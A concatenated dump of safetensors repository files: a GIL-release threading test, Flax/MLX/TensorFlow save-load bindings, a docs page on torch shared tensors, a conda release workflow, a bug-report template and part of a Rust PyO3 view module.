19 | # Build the tensor dict with data pointers (as serialize_file expects)
20 | tensor_data = {
21 | "tensor_a": {
22 | "dtype": tensor_a.dtype.name,
23 | "shape": tensor_a.shape,
24 | "data_ptr": tensor_a.ctypes.data,
25 | "data_len": tensor_a.nbytes,
26 | },
27 | "tensor_b": {
28 | "dtype": tensor_b.dtype.name,
29 | "shape": tensor_b.shape,
30 | "data_ptr": tensor_b.ctypes.data,
31 | "data_len": tensor_b.nbytes,
32 | },
33 | }
34 |
35 | num_threads = 4
36 | results = {}
37 | barrier = threading.Barrier(num_threads)
38 | file_names = [f"tmp_thread_{i}.safetensors" for i in range(num_threads)]
39 |
40 | def saving_thread(thread_id):
41 | file_name = file_names[thread_id]
42 | # Wait for all threads to be ready
43 | barrier.wait()
44 | start_time = time.monotonic()
45 | serialize_file(tensor_data, file_name)
46 | end_time = time.monotonic()
47 | results[thread_id] = (start_time, end_time)
48 |
49 | try:
50 | # Run multiple serialize_file calls concurrently
51 | with futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
52 | futs = [executor.submit(saving_thread, i) for i in range(num_threads)]
53 | for f in futs:
54 | f.result() # Raise any exceptions
55 |
56 | # Verify all threads completed
57 | self.assertEqual(len(results), num_threads)
58 |
59 | # Check that the threads actually ran concurrently by verifying
60 | # their execution windows overlap. If the GIL was held, threads
61 | # would run sequentially with no overlap.
62 | all_starts = [r[0] for r in results.values()]
63 | all_ends = [r[1] for r in results.values()]
64 |
65 | # The latest start should be before the earliest end if threads overlapped
66 | latest_start = max(all_starts)
67 | earliest_end = min(all_ends)
68 |
69 | # If GIL is released, threads run in parallel so latest_start < earliest_end
70 | # If GIL is NOT released, threads run sequentially so latest_start >= earliest_end
71 | self.assertLess(
72 | latest_start,
73 | earliest_end,
74 | f"Threads did not run concurrently - GIL may not be released. "
75 | f"Latest start: {latest_start}, Earliest end: {earliest_end}",
76 | )
77 |
78 | # Verify all output files are valid and contain correct data
79 | for file_name in file_names:
80 | loaded = load_file(file_name)
81 | np.testing.assert_array_equal(
82 | loaded["tensor_a"],
83 | tensor_a,
84 | err_msg=f"tensor_a mismatch in {file_name}",
85 | )
86 | np.testing.assert_array_equal(
87 | loaded["tensor_b"],
88 | tensor_b,
89 | err_msg=f"tensor_b mismatch in {file_name}",
90 | )
91 | finally:
92 | # Clean up all temporary files
93 | for file_name in file_names:
94 | if os.path.exists(file_name):
95 | os.remove(file_name)
96 |
97 |
98 | if __name__ == "__main__":
99 | unittest.main()
100 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import jax.numpy as jnp
7 | from jax import Array
8 | from safetensors import numpy, safe_open
9 |
10 |
11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes:
12 | """
13 | Saves a dictionary of tensors into raw bytes in safetensors format.
14 |
15 | Args:
16 | tensors (`Dict[str, Array]`):
17 | The incoming tensors. Tensors need to be contiguous and dense.
18 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
19 | Optional text only metadata you might want to save in your header.
20 | For instance it can be useful to specify more about the underlying
21 | tensors. This is purely informative and does not affect tensor loading.
22 |
23 | Returns:
24 | `bytes`: The raw bytes representing the format
25 |
26 | Example:
27 |
28 | ```python
29 | from safetensors.flax import save
30 | from jax import numpy as jnp
31 |
32 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
33 | byte_data = save(tensors)
34 | ```
35 | """
36 | np_tensors = _jnp2np(tensors)
37 | return numpy.save(np_tensors, metadata=metadata)
38 |
39 |
40 | def save_file(
41 | tensors: Dict[str, Array],
42 | filename: Union[str, os.PathLike],
43 | metadata: Optional[Dict[str, str]] = None,
44 | ) -> None:
45 | """
46 | Saves a dictionary of tensors into raw bytes in safetensors format.
47 |
48 | Args:
49 | tensors (`Dict[str, Array]`):
50 | The incoming tensors. Tensors need to be contiguous and dense.
52 |         filename (`str` or `os.PathLike`):
52 | The filename we're saving into.
53 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
54 | Optional text only metadata you might want to save in your header.
55 | For instance it can be useful to specify more about the underlying
56 | tensors. This is purely informative and does not affect tensor loading.
57 |
58 | Returns:
59 | `None`
60 |
61 | Example:
62 |
63 | ```python
64 | from safetensors.flax import save_file
65 | from jax import numpy as jnp
66 |
67 | tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
68 | save_file(tensors, "model.safetensors")
69 | ```
70 | """
71 | np_tensors = _jnp2np(tensors)
72 | return numpy.save_file(np_tensors, filename, metadata=metadata)
73 |
74 |
75 | def load(data: bytes) -> Dict[str, Array]:
76 | """
77 | Loads a safetensors file into flax format from pure bytes.
78 |
79 | Args:
80 | data (`bytes`):
81 | The content of a safetensors file
82 |
83 | Returns:
84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu
85 |
86 | Example:
87 |
88 | ```python
89 | from safetensors.flax import load
90 |
91 | file_path = "./my_folder/bert.safetensors"
92 | with open(file_path, "rb") as f:
93 | data = f.read()
94 |
95 | loaded = load(data)
96 | ```
97 | """
98 | flat = numpy.load(data)
99 | return _np2jnp(flat)
100 |
101 |
102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]:
103 | """
104 | Loads a safetensors file into flax format.
105 |
106 | Args:
107 |         filename (`str` or `os.PathLike`):
108 | The name of the file which contains the tensors
109 |
110 | Returns:
111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array`
112 |
113 | Example:
114 |
115 | ```python
116 | from safetensors.flax import load_file
117 |
118 | file_path = "./my_folder/bert.safetensors"
119 | loaded = load_file(file_path)
120 | ```
121 | """
122 | result = {}
123 | with safe_open(filename, framework="flax") as f:
124 | for k in f.offset_keys():
125 | result[k] = f.get_tensor(k)
126 | return result
127 |
128 |
129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]:
130 | for k, v in numpy_dict.items():
131 | numpy_dict[k] = jnp.array(v)
132 | return numpy_dict
133 |
134 |
135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.ndarray]:
136 | for k, v in jnp_dict.items():
137 | jnp_dict[k] = np.asarray(v)
138 | return jnp_dict
139 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 |
6 | import mlx.core as mx
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(
11 | tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None
12 | ) -> bytes:
13 | """
14 | Saves a dictionary of tensors into raw bytes in safetensors format.
15 |
16 | Args:
17 | tensors (`Dict[str, mx.array]`):
18 | The incoming tensors. Tensors need to be contiguous and dense.
19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
20 | Optional text only metadata you might want to save in your header.
21 | For instance it can be useful to specify more about the underlying
22 | tensors. This is purely informative and does not affect tensor loading.
23 |
24 | Returns:
25 | `bytes`: The raw bytes representing the format
26 |
27 | Example:
28 |
29 | ```python
30 | from safetensors.mlx import save
31 | import mlx.core as mx
32 |
33 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
34 | byte_data = save(tensors)
35 | ```
36 | """
37 | np_tensors = _mx2np(tensors)
38 | return numpy.save(np_tensors, metadata=metadata)
39 |
40 |
41 | def save_file(
42 | tensors: Dict[str, mx.array],
43 | filename: Union[str, os.PathLike],
44 | metadata: Optional[Dict[str, str]] = None,
45 | ) -> None:
46 | """
47 | Saves a dictionary of tensors into raw bytes in safetensors format.
48 |
49 | Args:
50 | tensors (`Dict[str, mx.array]`):
51 | The incoming tensors. Tensors need to be contiguous and dense.
52 |         filename (`str` or `os.PathLike`):
53 | The filename we're saving into.
54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
55 | Optional text only metadata you might want to save in your header.
56 | For instance it can be useful to specify more about the underlying
57 | tensors. This is purely informative and does not affect tensor loading.
58 |
59 | Returns:
60 | `None`
61 |
62 | Example:
63 |
64 | ```python
65 | from safetensors.mlx import save_file
66 | import mlx.core as mx
67 |
68 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
69 | save_file(tensors, "model.safetensors")
70 | ```
71 | """
72 | np_tensors = _mx2np(tensors)
73 | return numpy.save_file(np_tensors, filename, metadata=metadata)
74 |
75 |
76 | def load(data: bytes) -> Dict[str, mx.array]:
77 | """
78 | Loads a safetensors file into MLX format from pure bytes.
79 |
80 | Args:
81 | data (`bytes`):
82 | The content of a safetensors file
83 |
84 | Returns:
85 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
86 |
87 | Example:
88 |
89 | ```python
90 | from safetensors.mlx import load
91 |
92 | file_path = "./my_folder/bert.safetensors"
93 | with open(file_path, "rb") as f:
94 | data = f.read()
95 |
96 | loaded = load(data)
97 | ```
98 | """
99 | flat = numpy.load(data)
100 | return _np2mx(flat)
101 |
102 |
103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
104 | """
105 | Loads a safetensors file into MLX format.
106 |
107 | Args:
108 |         filename (`str` or `os.PathLike`):
109 | The name of the file which contains the tensors
110 |
111 | Returns:
112 | `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
113 |
114 | Example:
115 |
116 | ```python
117 |     from safetensors.mlx import load_file
118 |
119 | file_path = "./my_folder/bert.safetensors"
120 | loaded = load_file(file_path)
121 | ```
122 | """
123 | result = {}
124 | with safe_open(filename, framework="mlx") as f:
125 | for k in f.offset_keys():
126 | result[k] = f.get_tensor(k)
127 | return result
128 |
129 |
130 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
131 | for k, v in numpy_dict.items():
132 | numpy_dict[k] = mx.array(v)
133 | return numpy_dict
134 |
135 |
136 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.ndarray]:
137 | new_dict = {}
138 | for k, v in mx_dict.items():
139 | new_dict[k] = np.asarray(v)
140 | return new_dict
141 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/tensorflow.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 |
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import numpy, safe_open
8 |
9 |
10 | def save(
11 | tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None
12 | ) -> bytes:
13 | """
14 | Saves a dictionary of tensors into raw bytes in safetensors format.
15 |
16 | Args:
17 | tensors (`Dict[str, tf.Tensor]`):
18 | The incoming tensors. Tensors need to be contiguous and dense.
19 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
20 | Optional text only metadata you might want to save in your header.
21 | For instance it can be useful to specify more about the underlying
22 | tensors. This is purely informative and does not affect tensor loading.
23 |
24 | Returns:
25 | `bytes`: The raw bytes representing the format
26 |
27 | Example:
28 |
29 | ```python
30 | from safetensors.tensorflow import save
31 | import tensorflow as tf
32 |
33 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
34 | byte_data = save(tensors)
35 | ```
36 | """
37 | np_tensors = _tf2np(tensors)
38 | return numpy.save(np_tensors, metadata=metadata)
39 |
40 |
41 | def save_file(
42 | tensors: Dict[str, tf.Tensor],
43 | filename: Union[str, os.PathLike],
44 | metadata: Optional[Dict[str, str]] = None,
45 | ) -> None:
46 | """
47 | Saves a dictionary of tensors into raw bytes in safetensors format.
48 |
49 | Args:
50 | tensors (`Dict[str, tf.Tensor]`):
51 | The incoming tensors. Tensors need to be contiguous and dense.
52 |         filename (`str` or `os.PathLike`):
53 | The filename we're saving into.
54 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
55 | Optional text only metadata you might want to save in your header.
56 | For instance it can be useful to specify more about the underlying
57 | tensors. This is purely informative and does not affect tensor loading.
58 |
59 | Returns:
60 | `None`
61 |
62 | Example:
63 |
64 | ```python
65 | from safetensors.tensorflow import save_file
66 | import tensorflow as tf
67 |
68 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))}
69 | save_file(tensors, "model.safetensors")
70 | ```
71 | """
72 | np_tensors = _tf2np(tensors)
73 | return numpy.save_file(np_tensors, filename, metadata=metadata)
74 |
75 |
76 | def load(data: bytes) -> Dict[str, tf.Tensor]:
77 | """
78 | Loads a safetensors file into tensorflow format from pure bytes.
79 |
80 | Args:
81 | data (`bytes`):
82 | The content of a safetensors file
83 |
84 | Returns:
85 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu
86 |
87 | Example:
88 |
89 | ```python
90 | from safetensors.tensorflow import load
91 |
92 | file_path = "./my_folder/bert.safetensors"
93 | with open(file_path, "rb") as f:
94 | data = f.read()
95 |
96 | loaded = load(data)
97 | ```
98 | """
99 | flat = numpy.load(data)
100 | return _np2tf(flat)
101 |
102 |
103 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]:
104 | """
105 | Loads a safetensors file into tensorflow format.
106 |
107 | Args:
108 |         filename (`str` or `os.PathLike`):
109 | The name of the file which contains the tensors
110 |
111 | Returns:
112 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor`
113 |
114 | Example:
115 |
116 | ```python
117 | from safetensors.tensorflow import load_file
118 |
119 | file_path = "./my_folder/bert.safetensors"
120 | loaded = load_file(file_path)
121 | ```
122 | """
123 | result = {}
124 | with safe_open(filename, framework="tf") as f:
125 | for k in f.offset_keys():
126 | result[k] = f.get_tensor(k)
127 | return result
128 |
129 |
130 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]:
131 | for k, v in numpy_dict.items():
132 | numpy_dict[k] = tf.convert_to_tensor(v)
133 | return numpy_dict
134 |
135 |
136 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.ndarray]:
137 | for k, v in tf_dict.items():
138 | tf_dict[k] = v.numpy()
139 | return tf_dict
140 |
--------------------------------------------------------------------------------
/docs/source/torch_shared_tensors.mdx:
--------------------------------------------------------------------------------
1 | # Torch shared tensors
2 |
3 |
4 | ## TL;DR
5 |
6 | Use the dedicated functions below, which should work in most cases.
7 | This is not without side effects (see the caveat at the end).
8 |
9 | ```python
10 | from safetensors.torch import load_model, save_model
11 |
12 | save_model(model, "model.safetensors")
13 | # Instead of save_file(model.state_dict(), "model.safetensors")
14 |
15 | load_model(model, "model.safetensors")
16 | # Instead of model.load_state_dict(load_file("model.safetensors"))
17 | ```
18 |
19 | ## What are shared tensors?
20 |
21 | Pytorch uses shared tensors for some computations.
22 | This is extremely interesting for reducing memory usage in general.
23 |
24 | One very classic use case is in transformers, where the `embeddings` are shared with
25 | `lm_head`. By using the same matrix, the model uses fewer parameters, and gradients
26 | flow much better to the `embeddings` (which sit at the start of the model, where gradients
27 | don't flow easily, whereas `lm_head` is at the tail of the model, where gradients are
28 | extremely good; since they are the same tensor, both benefit).
29 |
30 |
31 | ```python
32 | import torch
33 | from torch import nn
34 | class Model(nn.Module):
35 | def __init__(self):
36 | super().__init__()
37 | self.a = nn.Linear(100, 100)
38 | self.b = self.a
39 |
40 | def forward(self, x):
41 | return self.b(self.a(x))
42 |
43 |
44 | model = Model()
45 | print(model.state_dict().keys())
46 | # odict_keys(['a.weight', 'a.bias', 'b.weight', 'b.bias'])
47 | torch.save(model.state_dict(), "model.bin")
48 | # This file is now 41k instead of ~80k, because `a` and `b` are the same weight, so only one copy is saved on disk, with both names pointing to the same buffer
49 | ```
50 |
51 | ## Why are shared tensors not saved in `safetensors`?
52 |
53 | Multiple reasons for that:
54 |
55 | - *Not all frameworks support them.* For instance, `tensorflow` does not.
56 | So if someone saves shared tensors in torch, there is no way to
57 | load them in a similar fashion, so we could not keep the same `Dict[str, Tensor]`
58 | API.
59 | - *It makes lazy loading tricky.*
60 | Lazy loading is the ability to load only some tensors, or parts of tensors, from
61 | a given file. This is trivial to do without tensor sharing, but with tensor sharing:
62 |
63 | ```python
64 | with safe_open("model.safetensors", framework="pt") as f:
65 | a = f.get_tensor("a")
66 | b = f.get_tensor("b")
67 | ```
68 |
69 | Now it's impossible with this code to "reshare" buffers after the fact.
70 | Once we hand out the `a` tensor, we have no way to give back the same memory when
71 | you ask for `b`. (In this particular example we could keep track of handed-out buffers,
72 | but this is not the case in general, since you could do arbitrary work with `a`,
73 | like sending it to another device, before asking for `b`.)
74 | - *It can lead to much larger files than necessary*.
75 | If you are saving a shared tensor which is only a fraction of a larger tensor,
76 | then saving it with pytorch leads to saving the entire buffer instead of saving
77 | just what is needed.
78 |
79 | ```python
80 | a = torch.zeros((100, 100))
81 | b = a[:1, :]
82 | torch.save({"b": b}, "model.bin")
83 | # File is 41k instead of the expected 400 bytes
84 | # In practice, you could end up saving tens of GB instead of 1GB.
85 | ```
86 |
87 | With all those reasons mentioned, nothing here is set in stone.
88 | Shared tensors do not cause unsafety or denial-of-service potential, so this
89 | decision could be revisited if the current workarounds are not satisfactory.
90 |
91 | ## How does it work?
92 |
93 | The design is rather simple.
94 | We look for all shared tensors, then for all tensors
95 | covering the entire buffer (there can be multiple such tensors).
96 | That gives us multiple names which could be saved; we simply choose the first one.
97 |
98 | During `load_model`, we load a bit like `load_state_dict` does, except
99 | we look into the model itself to check for shared buffers, and we ignore
100 | the "missing keys" which were actually covered by virtue of buffer sharing (they
101 | were properly loaded since the underlying buffer was loaded).
102 | Every other error is raised as-is.
103 |
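As a rough sketch of the detection step described above (not the library's actual code), shared tensors can be found by grouping `state_dict` entries by their underlying storage; `untyped_storage()` assumes a recent pytorch:

```python
from collections import defaultdict

import torch


def shared_tensor_groups(state_dict):
    # Group tensor names by the data pointer of their underlying storage.
    groups = defaultdict(list)
    for name, tensor in state_dict.items():
        groups[tensor.untyped_storage().data_ptr()].append(name)
    # Only groups with several names correspond to shared tensors;
    # one name per group is enough to save.
    return [names for names in groups.values() if len(names) > 1]


model = Model()  # the shared `a`/`b` model defined earlier
print(shared_tensor_groups(model.state_dict()))
# [['a.weight', 'b.weight'], ['a.bias', 'b.bias']]
```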
104 | **Caveat**: This means we drop some keys within the file. If you
105 | check the keys saved on disk, you will see some "missing tensors"; the same applies if
106 | you use `load_state_dict`. Unless we start supporting shared tensors directly in
107 | the format, there is no real way around it.
108 |
--------------------------------------------------------------------------------
/.github/workflows/python-release-conda.yml:
--------------------------------------------------------------------------------
1 | name: Python Release - Conda
2 |
3 | on:
4 | push:
5 | tags:
6 | - v*
7 |
8 | env:
9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }}
10 |
11 | jobs:
12 | build_and_package:
13 | runs-on: ${{ matrix.os }}
14 | strategy:
15 | matrix:
16 | os: [windows-latest, macos-latest]
17 | python: ["3.9", "3.10", "3.11", "3.12", "3.13"]
18 |
19 | steps:
20 | - name: Checkout repository
21 | uses: actions/checkout@v6
22 |
23 | - name: Install miniconda
24 | uses: conda-incubator/setup-miniconda@v3
25 | with:
26 | auto-update-conda: true
27 | miniconda-version: "latest"
28 | python-version: ${{ matrix.python }}
29 | channels: conda-forge
30 |
31 | - name: Conda info
32 | shell: bash -l {0}
33 | run: conda info
34 |
35 | - name: Install Rust
36 | uses: dtolnay/rust-toolchain@stable
37 |
38 | - name: Setup conda env
39 | shell: bash -l {0}
40 | run: |
41 | conda install setuptools-rust
42 | conda install -c defaults anaconda-client conda-build
43 |
44 | - name: Extract version
45 | shell: bash -l {0}
46 | working-directory: ./bindings/python
47 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
48 |
49 | - name: Build conda packages
50 | shell: bash -l {0}
51 | run: |
52 | conda info
53 | conda list
54 | conda-build .github/conda --python=${{ matrix.python }}
55 |
56 | - name: Upload to Anaconda
57 | shell: bash -l {0}
58 | run: |
59 | anaconda upload `conda-build .github/conda --output` --force
60 |
61 | build_and_package_linux:
62 | runs-on: ubuntu-latest
63 | container: quay.io/pypa/manylinux_2_28_x86_64
64 |
65 | strategy:
66 | fail-fast: false
67 | matrix:
68 | python: [39, 310, 311, 312, 313]
69 | include:
70 | - python: 39
71 | checksum: d8d13344b46a057659397b9ca1a948d184bf59f04efa8864df8c01f7557e2baa
72 | - python: 310
73 | checksum: 04a8b03d8b0ec062d923e592201a6fd88b7247c309ef8848afb25c424c40ac39
74 | - python: 311
75 | checksum: 238abad23f8d4d8ba89dd05df0b0079e278909a36e06955f12bbef4aa94e6131
76 | - python: 312
77 | checksum: a0def9c732d94b156529ef7db8edd6e1862cee784a27a4961870dca86e89fba4
78 | - python: 313
79 | checksum: 6022714da22986097bbefa13dab3d957257fef04e1c37d1ebd3645b5b99bc9d4
80 |
81 | steps:
82 | - name: Checkout repository
83 | uses: actions/checkout@v6
84 |
85 | - name: Install miniconda
86 | run: |
87 | yum install -y wget openssl-devel
88 | export FILENAME=Miniconda3-py${{ matrix.python }}_25.9.1-1-Linux-x86_64.sh
89 | wget https://repo.anaconda.com/miniconda/$FILENAME
90 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}'
91 | bash $FILENAME -b -p $HOME/miniconda
92 | source $HOME/miniconda/bin/activate
93 |
94 | - name: Show glibc information
95 | shell: bash -l {0}
96 | run: ldd --version
97 |
98 | - name: Conda info
99 | shell: bash -l {0}
100 | run: |
101 | source $HOME/miniconda/bin/activate
102 | conda info
103 |
104 | - name: Install Rust
105 | uses: dtolnay/rust-toolchain@stable
106 |
107 | - name: Setup conda env
108 | shell: bash -l {0}
109 | run: |
110 | source $HOME/miniconda/bin/activate
111 | conda install setuptools-rust
112 | conda install -c defaults anaconda-client conda-build
113 |
114 | - name: Extract version
115 | shell: bash -l {0}
116 | working-directory: ./bindings/python
117 | run: |
118 | source $HOME/miniconda/bin/activate
119 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV
120 |
121 | - name: Build conda packages
122 | shell: bash -l {0}
123 | run: |
124 | source $HOME/miniconda/bin/activate
125 | conda info
126 | conda list
127 | conda-build .github/conda --python=${{ matrix.python }}
128 |
129 | - name: Upload to Anaconda
130 | shell: bash -l {0}
131 | run: |
132 | source $HOME/miniconda/bin/activate
133 | anaconda upload `conda-build .github/conda --output` --force
134 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug-report.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F41B Bug Report"
2 | description: Submit a bug report to help us improve safetensors
3 | body:
4 | - type: textarea
5 | id: system-info
6 | attributes:
7 | label: System Info
8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below.
9 | placeholder: safetensors version, platform, python version, ...
10 | validations:
11 | required: true
12 |
13 | # - type: textarea
14 | # id: who-can-help
15 | # attributes:
16 | # label: Who can help?
17 | # description: |
18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @
19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**.
20 | #
21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and
22 | # a core maintainer will ping the right person.
23 | #
24 | # Please tag fewer than 3 people.
25 | #
26 | # Models:
27 |
28 | # - text models: @ArthurZucker and @younesbelkada
29 | # - vision models: @amyeroberts
30 | # - speech models: @sanchit-gandhi
31 | # - graph models: @clefourrier
32 | #
33 | # Library:
34 | #
35 | # - flax: @sanchit-gandhi
36 | # - generate: @gante
37 | # - pipelines: @Narsil
38 | # - tensorflow: @gante and @Rocketknight1
39 | # - tokenizers: @ArthurZucker
40 | # - trainer: @sgugger
41 | #
42 | # Integrations:
43 | #
44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100
45 | # - ray/raytune: @richardliaw, @amogkam
46 | # - Big Model Inference: @sgugger @muellerzr
47 | #
48 | # Documentation: @sgugger, @stevhliu and @MKhalusova
49 | #
50 | # Model hub:
51 |
52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator.
53 | #
54 | # HF projects:
55 | #
56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate)
57 | # - datasets: [different repo](https://github.com/huggingface/datasets)
58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers)
59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers)
60 | #
61 | # Maintained examples (not research project or legacy):
62 | #
63 | # - Flax: @sanchit-gandhi
64 | # - PyTorch: @sgugger
65 | # - TensorFlow: @Rocketknight1
66 |
67 | # Research projects are not maintained and should be taken as is.
68 |
69 | # placeholder: "@Username ..."
70 |
71 | - type: checkboxes
72 | id: information-scripts-examples
73 | attributes:
74 | label: Information
75 | description: 'The problem arises when using:'
76 | options:
77 | - label: "The official example scripts"
78 | - label: "My own modified scripts"
79 |
80 | - type: textarea
81 | id: reproduction
82 | validations:
83 | required: true
84 | attributes:
85 | label: Reproduction
86 | description: |
87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet.
88 | If you have code snippets, error messages, stack traces please provide them here as well.
89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting
90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code.
91 |
92 | placeholder: |
93 | Steps to reproduce the behavior:
94 |
95 | 1.
96 | 2.
97 | 3.
98 |
99 |
100 | - type: textarea
101 | id: expected-behavior
102 | validations:
103 | required: true
104 | attributes:
105 | label: Expected behavior
106 | description: "A clear and concise description of what you would expect to happen."
107 |
--------------------------------------------------------------------------------
/bindings/python/src/view.rs:
--------------------------------------------------------------------------------
1 | use crate::SafetensorError;
2 | #[cfg(feature = "py311")]
3 | use pyo3::buffer::PyBuffer;
4 | use pyo3::prelude::*;
5 | #[cfg(feature = "py38")]
6 | use pyo3::types::PyBytes;
7 | use pyo3::types::PyDict;
8 | use pyo3::Bound as PyBound;
9 | use safetensors::{Dtype, View};
10 | use std::borrow::Cow;
11 | use std::collections::HashMap;
12 |
13 | #[cfg(feature = "py38")]
14 | pub struct PyView<'a> {
15 |     shape: Vec<usize>,
16 | dtype: Dtype,
17 | data: PyBound<'a, PyBytes>,
18 | data_len: usize,
19 | }
20 |
21 | #[cfg(feature = "py311")]
22 | pub struct PyView<'a> {
23 |     shape: Vec<usize>,
24 |     dtype: Dtype,
25 |     data: PyBuffer<u8>,
26 | data_len: usize,
27 | // Kept to keep the GIL open while we hold the buffer
28 | _py: Python<'a>,
29 | }
30 |
31 | impl View for &PyView<'_> {
32 | #[cfg(feature = "py38")]
33 | fn data(&self) -> std::borrow::Cow<[u8]> {
34 | Cow::Borrowed(self.data.as_bytes())
35 | }
36 | #[cfg(feature = "py311")]
37 | fn data(&self) -> std::borrow::Cow<[u8]> {
38 | // We already checked this in the Python side.
39 | assert!(self.data.is_c_contiguous());
40 | // XXX: Ideally we could have at least readonly tensors
41 | // assert!(self.data.readonly());
42 | // SAFETY:
43 | // This is actually totally unsafe, PyBuffer is not immutable and could be changed from
44 | // under us.
45 | // This is made safer because we're still hanging to the GIL while treating
46 | // this structure
47 | Cow::Borrowed(unsafe {
48 | std::slice::from_raw_parts(self.data.buf_ptr() as *const u8, self.data.item_count())
49 | })
50 | }
51 | fn shape(&self) -> &[usize] {
52 | &self.shape
53 | }
54 | fn dtype(&self) -> Dtype {
55 | self.dtype
56 | }
57 | fn data_len(&self) -> usize {
58 | self.data_len
59 | }
60 | }
61 |
62 | pub fn prepare(tensor_dict: HashMap<String, PyBound<PyDict>>) -> PyResult<HashMap<String, PyView>> {
63 | let mut tensors = HashMap::with_capacity(tensor_dict.len());
64 | for (tensor_name, tensor_desc) in &tensor_dict {
65 |         let mut shape: Vec<usize> = tensor_desc
66 | .get_item("shape")?
67 | .ok_or_else(|| SafetensorError::new_err(format!("Missing `shape` in {tensor_desc:?}")))?
68 | .extract()?;
69 |         let pydata: PyBound<PyAny> = tensor_desc.get_item("data")?.ok_or_else(|| {
70 | SafetensorError::new_err(format!("Missing `data` in {tensor_desc:?}"))
71 | })?;
72 |
73 | let pydtype = tensor_desc.get_item("dtype")?.ok_or_else(|| {
74 | SafetensorError::new_err(format!("Missing `dtype` in {tensor_desc:?}"))
75 | })?;
76 | let dtype: String = pydtype.extract()?;
77 | let dtype = match dtype.as_ref() {
78 | "bool" => Dtype::BOOL,
79 | "int8" => Dtype::I8,
80 | "uint8" => Dtype::U8,
81 | "int16" => Dtype::I16,
82 | "uint16" => Dtype::U16,
83 | "int32" => Dtype::I32,
84 | "uint32" => Dtype::U32,
85 | "int64" => Dtype::I64,
86 | "uint64" => Dtype::U64,
87 | "float16" => Dtype::F16,
88 | "float32" => Dtype::F32,
89 | "float64" => Dtype::F64,
90 | "bfloat16" => Dtype::BF16,
91 | "float8_e4m3fn" => Dtype::F8_E4M3,
92 | "float8_e5m2" => Dtype::F8_E5M2,
93 | "float8_e8m0fnu" => Dtype::E8M0,
94 | "float4_e2m1fn_x2" => Dtype::F4,
95 | "complex64" => Dtype::C64,
96 | dtype_str => {
97 | return Err(SafetensorError::new_err(format!(
98 | "dtype {dtype_str} is not covered",
99 | )));
100 | }
101 | };
102 | if dtype == Dtype::F4 {
103 | let n = shape.len();
104 | shape[n - 1] *= 2;
105 | }
106 |
107 | #[cfg(feature = "py311")]
108 | let tensor = {
109 |             let data: PyBuffer<u8> = pydata.extract()?;
110 | if !data.is_c_contiguous() {
111 | return Err(SafetensorError::new_err("Python buffer is not contiguous"));
112 | }
